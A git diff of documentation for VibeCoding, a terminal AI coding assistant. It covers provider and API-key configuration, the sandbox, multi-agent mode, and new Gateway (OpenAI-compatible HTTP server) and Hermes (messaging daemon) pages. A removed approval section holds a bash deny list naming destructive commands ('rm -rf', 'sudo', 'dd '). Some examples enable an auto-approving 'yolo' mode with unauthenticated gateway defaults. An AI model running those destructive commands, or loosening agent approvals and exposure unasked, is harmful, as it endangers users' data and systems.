+| `deepseek-openai` | `DEEPSEEK_OPENAI_API_KEY` |
+| `deepseek-anthropic` | `DEEPSEEK_ANTHROPIC_API_KEY` |
+| `my-custom-provider` | `MY_CUSTOM_PROVIDER_API_KEY` |
+| `anthropic` | `ANTHROPIC_API_KEY` |
+| `openai` | `OPENAI_API_KEY` |
+
+The rule: replace `-` with `_`, uppercase everything, append `_API_KEY`.
+
+### Authentication Examples
+
+**Option 1: Environment Variables (simplest)**
 
 ```bash
 export DEEPSEEK_API_KEY=sk-...
 ```
 
-### Option 2: Inline in Configuration File
+With default config, VibeCoding will look for `DEEPSEEK_OPENAI_API_KEY` for the `deepseek-openai` provider. But if the provider's `apiKey` is set to `${DEEPSEEK_API_KEY}`, it reads that env var instead.
 
-Configure directly in `settings.json` providers:
+**Option 2: Inline in Configuration File**
 
 ```json
 {
@@ -365,28 +978,41 @@ Configure directly in `settings.json` providers:
 }
 ```
 
-### Key Resolution Order
+**Option 3: Password Manager**
+
+```json
+{
+  "providers": {
+    "deepseek-openai": {
+      "apiKey": "!pass show deepseek"
+    }
+  }
+}
+```
 
-1. Environment variable (`DEEPSEEK_API_KEY`)
-2. Inline in configuration file (`settings.json` providers.<name>.apiKey)
+---
 
 ## Environment Variable Overrides
 
-Any setting can be overridden via environment variables:
+These environment variables override settings at runtime:
+
+| Environment Variable | Overrides | Example |
+|---------------------|-----------|---------|
+| `VIBECODING_DIR` | Global config directory | `export VIBECODING_DIR=/custom/config` |
+| `VIBECODING_PROVIDER` | `defaultProvider` | `export VIBECODING_PROVIDER=anthropic` |
+| `VIBECODING_MODEL` | `defaultModel` | `export VIBECODING_MODEL=claude-sonnet-4-20250514` |
+| `VIBECODING_MODE` | `defaultMode` | `export VIBECODING_MODE=yolo` |
+| `VIBECODING_THINKING` | `defaultThinkingLevel` | `export VIBECODING_THINKING=high` |
+| `VIBECODING_DEBUG` | Enable provider-level request/response debug output | `export VIBECODING_DEBUG=1` |
 
-| Environment Variable | Overridden Setting |
-|---------------------|-------------------|
-| `VIBECODING_DIR` | Configuration directory |
-| `VIBECODING_PROVIDER` | defaultProvider |
-| `VIBECODING_MODEL` | defaultModel |
-| `VIBECODING_MODE` | defaultMode |
-| `VIBECODING_THINKING` | defaultThinkingLevel |
-| `VIBECODING_DEBUG` | Provider-level request/response debug output |
+---
 
 ## Configuration Examples
 
 ### Minimal Configuration
 
+Only need to set the default provider and model. Everything else uses sensible defaults.
+
 ```json
 {
   "defaultProvider": "deepseek-openai",
@@ -396,16 +1022,38 @@ Any setting can be overridden via environment variables:
 
 ### Multi-Provider Configuration
 
+Switch between providers at runtime using `/provider` or `--provider`:
+
 ```json
 {
   "providers": {
     "deepseek-anthropic": {
+      "vendor": "deepseek",
       "baseUrl": "https://api.deepseek.com/anthropic",
+      "apiKey": "${DEEPSEEK_API_KEY}",
       "api": "anthropic-messages"
     },
     "deepseek-openai": {
+      "vendor": "deepseek",
       "baseUrl": "https://api.deepseek.com",
+      "apiKey": "${DEEPSEEK_API_KEY}",
       "api": "openai-chat"
+    },
+    "anthropic": {
+      "vendor": "anthropic",
+      "baseUrl": "https://api.anthropic.com",
+      "apiKey": "${ANTHROPIC_API_KEY}",
+      "api": "anthropic-messages",
+      "cacheControl": true,
+      "models": [
+        {
+          "id": "claude-sonnet-4-20250514",
+          "name": "Claude Sonnet 4",
+          "contextWindow": 200000,
+          "maxTokens": 8192,
+          "cost": { "input": 3, "output": 15, "cacheRead": 0.3, "cacheWrite": 3.75 }
+        }
+      ]
     }
   },
   "defaultProvider": "deepseek-openai",
@@ -413,7 +1061,9 @@ Any setting can be overridden via environment variables:
 }
 ```
 
-### Custom API Endpoint
+### Custom API Endpoint / HTTP Proxy
+
+`baseUrl` points to an API endpoint or API gateway. `httpProxy` configures the network proxy used only by that provider's HTTP client. When `httpProxy` is empty, the provider keeps Go's default `HTTP_PROXY` / `HTTPS_PROXY` environment behavior.
 
 ```json
 {
@@ -421,116 +1071,67 @@ Any setting can be overridden via environment variables:
     "my-proxy": {
       "baseUrl": "https://my-proxy.example.com/v1",
       "api": "openai-chat",
-      "apiKey": "my-key",
+      "apiKey": "${MY_PROXY_API_KEY}",
+      "httpProxy": "http://127.0.0.1:7890",
       "models": [
         {
-          "id": "deepseek-v4-flash",
-          "name": "DeepSeek-V4-Flash (via proxy)"
+          "id": "gpt-4o",
+          "name": "GPT-4o (via proxy)",
+          "contextWindow": 128000,
+          "maxTokens": 16384
         }
       ]
     }
   },
-  "defaultProvider": "my-proxy"
+  "defaultProvider": "my-proxy",
+  "defaultModel": "gpt-4o"
 }
 ```
 
-### Enable Sandbox
+### Enable Sandbox with Custom Paths
 
 ```json
 {
   "sandbox": {
     "enabled": true,
-    "level": "standard"
+    "level": "standard",
+    "allowNetwork": false,
+    "allowedRead": ["/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc/ssl", "/opt/go"],
+    "passEnv": ["PATH", "HOME", "USER", "LANG", "TERM", "SHELL", "GOPATH", "GOROOT"],
+    "tmpSize": "200m"
   }
 }
 ```
 
-### approval
-
-Agent mode approval configuration, controls bash command approval behavior.
+### Enable Idle Compression for Long Sessions
 
 ```json
 {
-  "approval": {
-    "bashWhitelist": ["go ", "make ", "git ", "npm ", "yarn "],
-    "bashBlacklist": ["rm -rf", "sudo"]
+  "compaction": {
+    "enabled": true,
+    "reserveTokens": 16384,
+    "keepRecentTokens": 20000,
+    "idleCompressionEnabled": true,
+    "idleTimeoutSeconds": 60,
+    "idleMinTokensForCompress": 100000
   }
 }
 ```
 
-| Field | Type | Default | Description |
-|-------|------|---------|-------------|
-| `bashWhitelist` | []string | See below | Auto-approved command prefix list |
-| `bashBlacklist` | []string | [] | Commands always requiring approval |
+### Project-Level Override
 
-#### Default Whitelist
+Place in `.vibe/settings.json` to override specific settings for a project:
 
-```json
-[
-  "go ",
-  "make ",
-  "git ",
-  "npm ",
-  "yarn ",
-  "node ",
-  "python ",
-  "pip "
-]
-```
-
-#### Approval Flow
-
-- `bashBlacklist` has higher priority than `bashWhitelist`
-- In `agent` mode, blacklisted bash commands always require approval even if they also match the whitelist
-- In `yolo` mode, blacklisted bash commands still require approval
-- In `--print` mode, commands that would require approval fail immediately instead of being auto-approved
-
-```
-┌─────────────────────────────────────────────────────────────┐
-│                    Approval Flow                             │
-├─────────────────────────────────────────────────────────────┤
-│                                                              │
-│  Agent requests bash command execution                       │
-│  │                                                           │
-│  ▼                                                           │
-│  Check mode                                                  │
-│  ├─ Plan mode → Deny (read-only)                             │
-│  ├─ Agent mode → Continue checking                           │
-│  └─ YOLO mode → Auto-approve unless blacklisted              │
-│                                                              │
-│  Blacklist check (highest priority):                         │
-│  ├─ Command matches blacklist → Require user approval        │
-│  └─ Otherwise continue                                       │
-│                                                              │
-│  In Agent mode:                                              │
-│  ├─ Non-bash tool → Auto-approve                             │
-│  ├─ Command matches whitelist → Auto-approve                 │
-│  └─ Otherwise → Require user approval                        │
-│                                                              │
-│  User approval:                                              │
-│  ├─ Enter y/yes → Execute command                            │
-│  └─ Enter n/no → Deny execution                              │
-│                                                              │
-└─────────────────────────────────────────────────────────────┘
-```
-
-#### Example Configurations
-
-**Only allow git and npm:**
 ```json
 {
+  "defaultMode": "yolo",
+  "defaultThinkingLevel": "high",
+  "shellCommandPrefix": "source .venv/bin/activate && ",
   "approval": {
-    "bashWhitelist": ["git ", "npm "]
+    "bashWhitelist": ["python ", "pytest ", "pip ", "make "],
+    "confirmBeforeWrite": false
   }
 }
 ```
 
-**Custom blacklist:**
-```json
-{
-  "approval": {
-    "bashWhitelist": ["go ", "make ", "git "],
-    "bashBlacklist": ["rm -rf", "sudo", "dd "]
-  }
-}
-```
\ No newline at end of file
+This merges with your global settings — only the fields you specify are overridden.
diff --git a/docs/en/development.md b/docs/en/development.md
index 3d5d957..49e6161 100644
--- a/docs/en/development.md
+++ b/docs/en/development.md
@@ -207,72 +207,46 @@ func TestMyTool_Execute(t *testing.T) {
 }
 ```
 
-## Adding New Providers
+## Adding Provider Support
 
-### Step 1: Create Provider Directory
+Most new services should be added as vendor adapters, not new protocol
+providers. If the service speaks OpenAI Chat Completions or Anthropic Messages,
+reuse the generic provider and register vendor defaults in `internal/provider`.
 
-```bash
-mkdir -p internal/provider/myprovider
-```
+### Add an OpenAI/Anthropic-Compatible Vendor
 
-### Step 2: Implement Provider Interface
+1. Create `internal/provider/vendor_myvendor.go`.
+2. Register URL detection and defaults with `RegisterVendorAdapter`.
+3. Add model `compat` flags only for behavior that differs from the generic protocol.
+4. Add focused tests in `internal/provider` and, if request formatting changes, in `internal/provider/openai` or `internal/provider/anthropic`.
 
 ```go
-// internal/provider/myprovider/provider.go
-package myprovider
-
-import (
-    "context"
-    "github.com/startvibecoding/vibecoding/internal/provider"
-)
-
-type MyProvider struct {
-    apiKey  string
-    baseURL string
-}
-
-func NewProvider(apiKey, baseURL string) *MyProvider {
-    return &MyProvider{apiKey: apiKey, baseURL: baseURL}
-}
-
-func (p *MyProvider) Name() string {
-    return "myprovider"
-}
-
-func (p *MyProvider) Models() []*provider.Model {
-    return []*provider.Model{
-        {ID: "model-1", Name: "Model 1"},
-    }
-}
-
-func (p *MyProvider) GetModel(id string) *provider.Model {
-    for _, m := range p.Models() {
-        if m.ID == id {
-            return m
-        }
-    }
-    return nil
-}
-
-func (p *MyProvider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
-    ch := make(chan provider.StreamEvent)
-    go func() {
-        defer close(ch)
-        // Implement streaming call
-    }()
-    return ch
+package provider
+
+func init() {
+    RegisterVendorAdapter(simpleVendorAdapter{
+        name:           "myvendor",
+        domains:        []string{"api.myvendor.example"},
+        thinkingFormat: "deepseek", // optional
+        defaultAPI:     "openai-chat",
+    })
 }
 ```
 
-### Step 3: Register Provider
+Provider creation for CLI and ACP goes through `internal/provider/factory`, so
+do not add vendor-specific creation code to `cmd/vibecoding/main.go` or
+`internal/acp/acp.go`.
 
-In `cmd/vibecoding/main.go`'s `createProvider()` function:
+### Add a New Protocol Provider
 
-```go
-case "myprovider":
-    apiKey := settings.ResolveKey(providerName)
-    p = myprovider.NewProvider(apiKey, pc.BaseURL)
-```
+Only add a new provider package when the service has a native protocol that is
+not covered by OpenAI Chat Completions or Anthropic Messages.
+
+1. Create `internal/provider/myprotocol`.
+2. Implement `provider.Provider`.
+3. Add construction support in `internal/provider/factory`.
+4. Keep settings JSON compatibility stable.
+5. Add provider and factory tests.
 
 ## Testing
 
@@ -457,4 +431,4 @@ A:
 A:
 1. Use `--debug` flag
 2. Check if bwrap is installed: `bwrap --version`
-3. Check system logs
\ No newline at end of file
+3. Check system logs
diff --git a/docs/en/faq.md b/docs/en/faq.md
index f6f2824..e7efd0f 100644
--- a/docs/en/faq.md
+++ b/docs/en/faq.md
@@ -4,7 +4,7 @@
 
 ### Q: What is VibeCoding?
 
-A: VibeCoding is a terminal AI coding assistant that supports DeepSeek (default), OpenAI, Anthropic, and any custom API via OpenAI/Anthropic-compatible protocols, providing code writing, debugging, refactoring, and other features.
+A: VibeCoding is a terminal AI coding assistant that supports DeepSeek (default), OpenAI, Anthropic, vendor adapters for compatible APIs, and generic OpenAI/Anthropic-format custom endpoints. It provides code writing, debugging, refactoring, delegated multi-agent workflows, and other features.
 
 ### Q: What LLMs are supported?
 
@@ -12,8 +12,8 @@ A:
 - DeepSeek (default): deepseek-v4-flash, deepseek-v4-pro (1M context, up to 384K output)
 - OpenAI: GPT-4o, o1, etc.
 - Anthropic: Claude Sonnet, Opus, etc.
-- Xiaomi: MiMo models (via OpenAI-compatible API)
-- Custom: Any OpenAI-Chat or Anthropic-Messages compatible API endpoint
+- Vendor adapters: Google Gemini, Google Vertex, Xiaomi, Kimi, MiniMax, Seed, Qianfan, Bailian, Gitee, OpenRouter, Together, Groq, Fireworks, and more
+- Custom: Any OpenAI Chat or Anthropic Messages compatible API endpoint through generic fallback
 
 ### Q: How to install?
 
@@ -57,6 +57,7 @@ A: Configure in `settings.json`:
 {
   "providers": {
     "deepseek-openai": {
+      "vendor": "deepseek",
       "baseUrl": "https://api.deepseek.com",
       "api": "openai-chat",
       "apiKey": "sk-..."
@@ -254,7 +255,7 @@ A:
 
 ### Q: What tools are available?
 
-A: VibeCoding has 7 built-in tools:
+A: VibeCoding includes core built-in tools plus optional multi-agent tools:
 - `read`: Read file content (including images)
 - `write`: Create/overwrite files
 - `edit`: Precise text replacement
@@ -262,9 +263,22 @@ A: VibeCoding has 7 built-in tools:
 - `grep`: Regex content search
 - `find`: Filename search
 - `ls`: Directory listing
+- `plan`: Publish visible task plans and status updates
+- `subagent_*`: Delegate work to child agents when started with `--multi-agent`
 
 See the [Tool System](tools.md) documentation for details.
 
+### Q: How do I use multi-agent workflows?
+
+A: Start VibeCoding with `--multi-agent`:
+
+```bash
+vibecoding --multi-agent
+vibecoding acp --multi-agent
+```
+
+This registers `subagent_*` tools for delegated work. Cron command entry points also rely on multi-agent mode.
+
 ### Q: Can VibeCoding read images?
 
 A: Yes! The `read` tool supports PNG, JPEG, GIF, and WebP images. Images are sent as base64-encoded data to the LLM for analysis.
@@ -335,4 +349,4 @@ A: MIT License
 
 ### Q: What is the current version?
 
-A: The current version is v0.1.9. See the [Changelog](changelog.md) for version history.
\ No newline at end of file
+A: The current version is v0.1.25. See the [Changelog](changelog.md) for version history.
diff --git a/docs/en/gateway.md b/docs/en/gateway.md
new file mode 100644
index 0000000..74ac665
--- /dev/null
+++ b/docs/en/gateway.md
@@ -0,0 +1,339 @@
+# Gateway Mode
+
+## Overview
+
+Gateway mode runs VibeCoding as an HTTP server that exposes a **standard OpenAI Chat Completions API**. Any OpenAI-compatible client — Cursor, Continue, Open WebUI, Python SDK, custom scripts — can connect directly, with the VibeCoding agent loop handling tool execution transparently behind the scenes.
+
+```bash
+vibecoding gateway
+```
+
+## Quick Start
+
+```bash
+# Generate config template
+vibecoding --init-gateway
+
+# Start the gateway (default :8080)
+vibecoding gateway
+
+# Test it
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "list files in current directory"}],
+    "stream": false
+  }'
+```
+
+## CLI Flags
+
+| Flag | Description |
+|------|-------------|
+| `--port` | Listen port (default: from config or 8080) |
+| `--config` | Path to gateway.json |
+| `--work-dir` | Default working directory |
+| `--provider` / `-p` | Override provider |
+| `--model` / `-m` | Override model |
+| `--sandbox` | Enable sandbox (bwrap) |
+| `--multi-agent` | Enable sub-agent tools |
+| `--verbose` | Verbose output |
+| `--debug` | Debug logging |
+
+## Configuration
+
+Gateway uses its own config file `gateway.json`, separate from `settings.json`.
+
+**Config locations** (highest priority first):
+
+1. CLI `--config /path/to/gateway.json`
+2. `.vibe/gateway.json` (project-level)
+3. `~/.vibecoding/gateway.json` (global)
+
+Generate a template with:
+
+```bash
+vibecoding --init-gateway
+vibecoding --init-gateway --force  # overwrite existing
+```
+
+### Full Config Reference
+
+```jsonc
+{
+  "listen": ":8080",
+
+  "auth": {
+    "enabled": false,
+    "tokens": ["sk-your-secret-token"]
+  },
+
+  "defaultMode": "yolo",
+  "defaultThinkingLevel": "medium",
+  "enableSubAgents": false,
+
+  "sandbox": {
+    "enabled": false,
+    "level": ""       // "none", "standard", "strict"; empty = auto from mode
+  },
+
+  "workingDir": "/home/user/projects",
+
+  "allowedWorkDirs": [
+    "/home/user/projects",
+    "/opt/repos"
+  ],
+
+  "session": {
+    "idleTimeoutSeconds": 1800,
+    "maxSessions": 0
+  },
+
+  "toolVisibility": {
+    "mode": "content",      // "content", "sse_event", "none"
+    "detail": "collapsed"   // "collapsed", "expanded"
+  },
+
+  "systemPromptMode": "append",   // "append", "ignore"
+  "requestTimeoutSeconds": 1800,
+  "maxConcurrentRequests": 0,
+
+  "cors": {
+    "enabled": false,
+    "allowOrigins": ["*"]
+  },
+
+  "provider": "",
+  "model": "",
+  "logLevel": "info"
+}
+```
+
+If Gateway is configured to listen beyond loopback, runs in `yolo` mode, and authentication is disabled, startup prints a warning. For exposed deployments, enable `auth.enabled`, restrict `allowedWorkDirs`, and consider enabling the sandbox.
+
+## API Endpoints
+
+### POST /v1/chat/completions
+
+Standard OpenAI Chat Completions API. Supports streaming and non-streaming.
+
+**Request:**
+
+```json
+{
+  "model": "deepseek-v4-flash",
+  "messages": [
+    {"role": "system", "content": "You are a helpful assistant."},
+    {"role": "user", "content": "Read main.go and explain it."}
+  ],
+  "stream": true,
+  "max_tokens": 4096,
+  "x_session_id": "my-session",
+  "x_mode": "yolo",
+  "x_working_dir": "/home/user/project"
+}
+```
+
+Extension fields (`x_*`) are optional:
+
+| Field | Description |
+|-------|-------------|
+| `x_session_id` | Associate with an existing session (omit for new) |
+| `x_mode` | Override mode for this request |
+| `x_working_dir` | Override working directory (must pass `allowedWorkDirs`) |
+
+**Non-streaming response:**
+
+```json
+{
+  "id": "chatcmpl-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [{
+    "index": 0,
+    "message": {"role": "assistant", "content": "Here is the explanation..."},
+    "finish_reason": "stop"
+  }],
+  "usage": {"prompt_tokens": 100, "completion_tokens": 200, "total_tokens": 300},
+  "x_session_id": "my-session",
+  "x_tool_calls": [
+    {"name": "read", "args": {"path": "main.go"}, "status": "completed"}
+  ]
+}
+```
+
+**Streaming response** uses standard SSE format with `data:` lines and `[DONE]` sentinel.
+
+### GET /v1/models
+
+Returns available models.
+
+### GET /health
+
+Health check (no auth required).
+
+```json
+{"status": "ok", "version": "v0.1.26", "sessions": 3}
+```
+
+## Slash Commands
+
+When the last user message starts with `/`, it is processed as a command at the gateway layer — no LLM is called.
+
+| Command | Description |
+|---------|-------------|
+| `/clear` | Clear session context |
+| `/mode [plan\|agent\|yolo]` | Show or switch mode |
+| `/model [model_id]` | Show or switch model |
+| `/models` | List available models |
+| `/sessions` | List active sessions |
+| `/sessions del <id>` | Delete a session |
+| `/compact` | Trigger context compaction |
+| `/status` | Show session status |
+| `/skill <name>` | Activate a skill |
+| `/skills` | List available skills |
+| `/help` | Show all commands |
+
+Commands return standard OpenAI response format. Works in both `stream: true` and `stream: false`.
+
+## Tool Visibility
+
+Controls how tool execution appears in the response content.
+
+### Mode
+
+| `toolVisibility.mode` | Behavior |
+|------------------------|----------|
+| `content` (default) | Tool output mixed into content stream |
+| `sse_event` | Tool output via separate `event: tool_status` SSE events |
+| `none` | No tool output, client sees only final text |
+
+### Detail
+
+| `toolVisibility.detail` | Behavior |
+|--------------------------|----------|
+| `collapsed` (default) | One-line summary: `🔧 read: main.go ✅` |
+| `expanded` | Full output in code fences with language detection |
+
+**Collapsed mode** (default): most tools show a one-line summary. `edit`/`write` with diffs always show the diff. Errors always show in full.
+
+**Expanded mode**: tool results wrapped in fenced code blocks with auto-detected language (`.go` → `go`, `.py` → `python`, bash output → `bash`, diffs → `diff`).
+
+## Multi-Session
+
+Each request can be associated with a session via `x_session_id`. Sessions maintain independent agent state, message history, and tools.
+
+- No `x_session_id` → new session per request (stateless)
+- With `x_session_id` → multi-turn conversation (stateful)
+- Sessions auto-expire after `idleTimeoutSeconds`
+- Requests within the same session are serialized
+
+## Authentication
+
+Set `auth.enabled: true` and configure `auth.tokens`:
+
+```json
+{
+  "auth": {
+    "enabled": true,
+    "tokens": ["sk-token-1", "sk-token-2"]
+  }
+}
+```
+
+Clients send: `Authorization: Bearer sk-token-1`
+
+The `/health` endpoint is always unauthenticated.
+
+## CORS
+
+When CORS is enabled, Gateway returns a single `Access-Control-Allow-Origin` value:
+
+- `allowOrigins: ["*"]` allows any origin
+- otherwise, the request `Origin` must exactly match one configured origin
+- if there is no `Origin` header and exactly one origin is configured, that origin is returned
+
+## Security
+
+Three independent layers:
+
+| Layer | Mechanism | Purpose |
+|-------|-----------|---------|
+| L1 | Bearer Token | Block unauthorized access |
+| L2 | `allowedWorkDirs` | Restrict file system scope |
+| L3 | Sandbox (bwrap) | OS-level isolation |
+
+### allowedWorkDirs
+
+Controls which directories `x_working_dir` can switch to:
+
+- Not set (`null`) → no restriction
+- Empty `[]` → deny all overrides, only `workingDir` allowed
+- List of paths → path-aware match with separator boundaries
+
+`workingDir` itself is always trusted (admin-configured).
+
+## Client Examples
+
+### Python OpenAI SDK
+
+```python
+from openai import OpenAI
+
+client = OpenAI(
+    base_url="http://localhost:8080/v1",
+    api_key="sk-my-token",  # if auth enabled
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[
+        {"role": "user", "content": "Read main.go and explain it."},
+    ],
+    stream=True,
+)
+
+for chunk in response:
+    if chunk.choices[0].delta.content:
+        print(chunk.choices[0].delta.content, end="")
+```
+
+### Multi-turn with Session
+
+```python
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "read main.go"}],
+    extra_body={"x_session_id": "my-session"},
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "now refactor the error handling"}],
+    extra_body={"x_session_id": "my-session"},
+)
+```
+
+### curl
+
+```bash
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer sk-my-token" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "explain main.go"}],
+    "stream": true
+  }'
+```
+
+## System Prompt Handling
+
+| `systemPromptMode` | Behavior |
+|---------------------|----------|
+| `append` (default) | Client system messages appended to built-in system prompt |
+| `ignore` | Client system messages discarded |
+
+The built-in system prompt includes tool definitions, mode instructions, and context files. `append` mode preserves all of this while adding client customizations.
diff --git a/docs/en/getting-started.md b/docs/en/getting-started.md
index 1aba596..ebee3e3 100644
--- a/docs/en/getting-started.md
+++ b/docs/en/getting-started.md
@@ -88,12 +88,17 @@ Or add keys directly to your settings.json:
 ```json
 {
   "providers": {
-    "deepseek-openai": { "apiKey": "sk-..." }
+    "deepseek-openai": {
+      "vendor": "deepseek",
+      "api": "openai-chat",
+      "baseUrl": "https://api.deepseek.com",
+      "apiKey": "sk-..."
+    }
   }
 }
 ```
 
-See the [Configuration Guide](configuration.md) for details.
+The optional `vendor` field selects a vendor adapter. If it is omitted, VibeCoding detects the vendor from `baseUrl` when possible and otherwise falls back to the generic provider selected by `api`. See the [Configuration Guide](configuration.md) for details.
 
 ## First Run
 
@@ -127,6 +132,30 @@ vibecoding --provider deepseek-openai --model deepseek-v4-flash
 vibecoding --provider deepseek-openai --model deepseek-v4-pro
 ```
 
+### Multi-Agent Mode
+
+```bash
+# Enable sub-agent tools and multi-agent commands
+vibecoding --multi-agent
+
+# ACP sessions can opt in too
+vibecoding acp --multi-agent
+```
+
+Multi-agent mode registers `subagent_*` tools for delegated work. Cron command entry points are available in TUI multi-agent workflows.
+
+### A2A Master Mode
+
+```bash
+# Generate sample config
+vibecoding --init-a2a-master-config
+
+# Enable master mode
+vibecoding --enable-a2a-master
+```
+
+A2A Master mode lets you manage multiple remote A2A agents, with the LLM automatically dispatching tasks via the `a2a_dispatch` tool. See [A2A Protocol](a2a.md) for details.
+
 ## Choose Mode
 
 VibeCoding provides three modes:
@@ -231,7 +260,7 @@ Add to `settings.json`:
   "acp.agents": {
     "vibecoding": {
       "command": "vibecoding",
-      "args": ["acp", "--mode", "agent"]
+      "args": ["acp", "--mode", "agent", "--multi-agent"]
     }
   }
 }
@@ -250,6 +279,8 @@ See the [ACP Protocol](acp.md) documentation for details.
 
 - Read the [Configuration Guide](configuration.md) to customize settings
 - Check the [Tool Reference](tools.md) to learn about available tools
+- Try [multi-agent mode](cli-reference.md#multi-agent-mode) for delegated investigation and cron command entry points
 - Understand the [Security Model](security.md) to protect your system
 - Explore the [Skills System](skills.md) to create reusable prompt snippets
-- Set up [IDE Integration](acp.md) with VS Code or JetBrains
\ No newline at end of file
+- Set up [IDE Integration](acp.md) with VS Code or JetBrains
+- Check out [Scenarios & Walkthroughs](scenarios.md) for practical usage examples
diff --git a/docs/en/hermes.md b/docs/en/hermes.md
new file mode 100644
index 0000000..a3d67b9
--- /dev/null
+++ b/docs/en/hermes.md
@@ -0,0 +1,443 @@
+# Hermes Mode
+
+## Overview
+
+Hermes mode runs VibeCoding as a **messaging gateway daemon** with WebSocket/HTTP API, WeChat, Feishu, and A2A protocol support. It transforms VibeCoding from a coding assistant into a deployable autonomous agent.
+
+```bash
+vibecoding hermes start
+```
+
+## Quick Start
+
+```bash
+# Generate config template
+vibecoding hermes config init
+
+# Start hermes (foreground)
+vibecoding hermes start
+
+# Start hermes (background)
+vibecoding hermes start -d
+
+# Check status
+vibecoding hermes status
+
+# Stop hermes
+vibecoding hermes stop
+
+# Connect as client
+vibecoding hermes client
+```
+
+## Architecture
+
+```
+                    ┌─────────────────────────────────────┐
+                    │         Hermes Gateway (:8090)       │
+                    │                                     │
+                    │  ┌─────────┐  ┌─────────┐  ┌─────┐ │
+   WeChat ─────────►│  │Messaging│  │  HTTP   │  │ A2A │ │
+   Feishu ─────────►│  │Platform │  │  REST   │  │     │ │
+                    │  └────┬────┘  └────┬────┘  └──┬──┘ │
+                    │       │            │          │     │
+                    │       └──────┬─────┘──────────┘     │
+                    │              ▼                       │
+                    │       ┌──────────┐                  │
+                    │       │Dispatcher│                  │
+                    │       └────┬─────┘                  │
+                    │            ▼                        │
+                    │  ┌──────────────────┐               │
+                    │  │   Agent Loop     │               │
+                    │  │  (per-user)      │               │
+                    │  └──────────────────┘               │
+                    └─────────────────────────────────────┘
+```
+
+## CLI Commands
+
+### `hermes start`
+
+Start the Hermes daemon.
+
+| Flag | Description |
+|------|-------------|
+| `-d` | Run in background |
+| `--port` | Listen port (default: from config or 8090) |
+| `--work-dir` | Default working directory |
+| `-p`, `--provider` | Override default provider |
+| `-m`, `--model` | Override default model |
+| `--multi-agent` | Enable sub-agent tools |
+| `--sandbox` | Enable bwrap sandbox |
+| `--config` | Path to hermes.json |
+| `--verbose` | Verbose output |
+| `--debug` | Debug logging |
+
+### `hermes stop`
+
+Stop the running Hermes daemon via PID file + SIGTERM.
+
+### `hermes status`
+
+Check Hermes daemon status (PID check + HTTP health query).
+
+### `hermes client`
+
+Connect to a running Hermes instance via WebSocket.
+
+| Flag | Description |
+|------|-------------|
+| `--url` | WebSocket URL (default: `ws://localhost:8090/ws`) |
+| `--session` | Session ID to resume |
+
+**Client Commands:**
+- `/help` — Show help
+- `/new` — Start a new session
+- `/clear` — Clear current session
+- `/status` — Show session status
+- `/sessions` — List active sessions
+- `/mode <mode>` — Set mode (plan/agent/yolo)
+- `/compact` — Trigger compaction
+- `/quit` — Exit
+
+### `hermes config`
+
+Manage Hermes configuration.
+
+```bash
+vibecoding hermes config init              # Create global config template
+vibecoding hermes config init --project    # Create project config template
+vibecoding hermes config show              # Show effective config
+```
+
+### `hermes wechat`
+
+Manage WeChat iLink connection.
+
+```bash
+vibecoding hermes wechat login             # QR code login
+vibecoding hermes wechat login --force     # Force re-login
+vibecoding hermes wechat status            # Show connection status
+```
+
+### `hermes feishu`
+
+Manage Feishu (Lark) connection.
+
+```bash
+vibecoding hermes feishu setup             # Show configuration guide
+vibecoding hermes feishu status            # Show connection status
+```
+
+### `hermes webhook`
+
+Manage webhook routes.
+
+```bash
+vibecoding hermes webhook list             # List configured routes
+```
+
+### `hermes memory`
+
+Manage persistent memory.
+
+```bash
+vibecoding hermes memory show              # Show memory.md content
+vibecoding hermes memory clear             # Reset memory.md
+```
+
+### `hermes sessions`
+
+Manage sessions.
+
+```bash
+vibecoding hermes sessions list            # List active sessions (queries running instance)
+```
+
+### `hermes cron`
+
+Manage cron scheduled tasks.
+
+```bash
+vibecoding hermes cron list                # List all cron jobs
+vibecoding hermes cron add <name> <prompt> # Add a cron job
+vibecoding hermes cron remove <id>         # Remove a cron job
+vibecoding hermes cron enable <id>         # Enable a cron job
+vibecoding hermes cron disable <id>        # Disable a cron job
+```
+
+## Configuration
+
+### `hermes.json`
+
+Configuration file for Hermes mode. Supports global + project-level overlay.
+
+**Locations:**
+- Global: `<GLOBAL_DIR>/hermes.json`
+- Project: `.vibe/hermes.json` (overrides global)
+
+```jsonc
+{
+  "server": {
+    "port": 8090,
+    "host": "0.0.0.0",
+    "auth_token": ""
+  },
+  "default_provider": "",
+  "default_model": "",
+  "multi_agent": false,
+  "sandbox": false,
+  "wechat": {
+    "enabled": false,
+    "cred_path": "",
+    "work_dir": "",
+    "allowed_users": [],
+    "auto_typing": true
+  },
+  "feishu": {
+    "enabled": false,
+    "app_id": "",
+    "app_secret": "",
+    "work_dir": "",
+    "allowed_users": []
+  },
+  "webhooks": {
+    "enabled": false,
+    "secret": "",
+    "routes": [
+      {
+        "path": "/github",
+        "events": ["push", "pull_request"],
+        "skill": "code-review",
+        "delivery": "feishu",
+        "delivery_target": "chat_id"
+      }
+    ]
+  },
+  "a2a": {
+    "enabled": false,
+    "port": 8093
+  },
+  "cron": {
+    "enabled": true
+  },
+  "memory": {
+    "enabled": true,
+    "path": ""
+  },
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": []
+  },
+  "hooks": {
+    "pre_tool_call": "",
+    "post_tool_call": ""
+  },
+  "agent": {
+    "max_turns": 90,
+    "budget_pressure": true,
+    "context_pressure": true,
+    "budget_pressure_threshold": 0.20,
+    "context_pressure_threshold": 0.55
+  },
+  "work_dir": "."
+}
+```
+
+### Configuration Priority
+
+```
+CLI flags > hermes.json (project) > hermes.json (global) > defaults
+```
+
+### Working Directory Priority
+
+```
+Platform work_dir (wechat/feishu) > Global work_dir > CLI --work-dir > cwd
+```
+
+## Messaging Platforms
+
+### WeChat (iLink Protocol)
+
+- Zero external dependencies (Go stdlib only)
